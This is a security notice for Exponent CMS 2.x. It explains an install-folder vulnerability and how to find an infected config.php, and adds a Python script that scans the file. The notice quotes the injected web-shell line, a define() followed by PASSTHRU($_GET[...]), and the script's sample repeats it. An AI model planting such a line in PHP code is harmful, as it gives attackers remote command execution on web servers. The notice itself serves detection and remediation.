Security Notice: Closing an Exponent Security Vulnerability
We've been notified of a security vulnerability which could compromise your Exponent CMS installation. This vulnerability applies to all versions of Exponent 2.x up to v2.3.7 patch #2. The immediate fix is to rename the /install folder to something else, or remove/delete it. Though we've been working hard to close Cross-Site Scripting (XSS) vulnerabilities, this one could be more permanent and seems to result from an anomaly within PHP which allows a string variable to be internally interpreted and processed as an array, thereby masking the payload.
To see if your site has been infected, you'll need to view the /conf/config.php file in older versions or the /framework/conf/config.php file in newer installations. If infected, you will find an additional line at or near the bottom of that file which is not simply a 'define', but has two commands on the same line separated by a semicolon, with the remainder of the line commented out. Normally a line in config.php would look something like:
define("DB_ENGINE",'mysqli');
however, an infected line would look similar to:
define("",""); PASSTHRU($_GET[",'"]); // ');
The immediate fix for this type of infection is to remove/delete the affected line from the config.php file.
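The check described above can be scripted. The following Python script is an added example, not part of the original notice or of Exponent's own code; it reports any define() line in config.php that has further text after its first statement. The SITE_TITLE constant and the sample text are constructed for illustration, and a legitimate line carrying a trailing comment will also be reported for manual review.

```python
import re
import sys

DEFINE_START = re.compile(r"^\s*define\s*\(", re.IGNORECASE)

def trailing_code(line):
    """Return the text that follows the first statement on a define() line.

    Quotes are tracked so that a ';' inside a string literal is not taken
    for the end of the statement. Returns '' for a clean or non-define line.
    """
    if not DEFINE_START.match(line):
        return ""
    quote = None      # quote character of the string we are inside, if any
    escaped = False   # True when the previous character was a backslash
    for i, ch in enumerate(line):
        if quote:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == ";":
            return line[i + 1:].strip()
    return ""

def scan(text):
    """Return (line_number, line, trailing_text) for each suspicious line."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        extra = trailing_code(line)
        if extra:
            hits.append((number, line.strip(), extra))
    return hits

# Constructed sample: the two lines quoted in the notice plus one benign
# line (hypothetical constant) whose value contains a semicolon.
SAMPLE = '''<?php
define("DB_ENGINE",'mysqli');
define("SITE_TITLE",'News; updates');
define("",""); PASSTHRU($_GET[",'"]); // ');
'''

if __name__ == "__main__":
    # Pass the path to config.php; with no argument the sample is scanned.
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    for number, line, extra in scan(text):
        print(f"line {number}: text after define(): {extra!r}")
```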
We'll be shipping a formal fix to this vulnerability within a few days. This patch #3 to v2.3.7 will also include the entire '/install' folder to ensure your v2.3.7 site can be upgraded. The /install folder is needed not only for installations, but is also used for version upgrades, or for running an upgrade script from the Exponent/Super-Admin menu.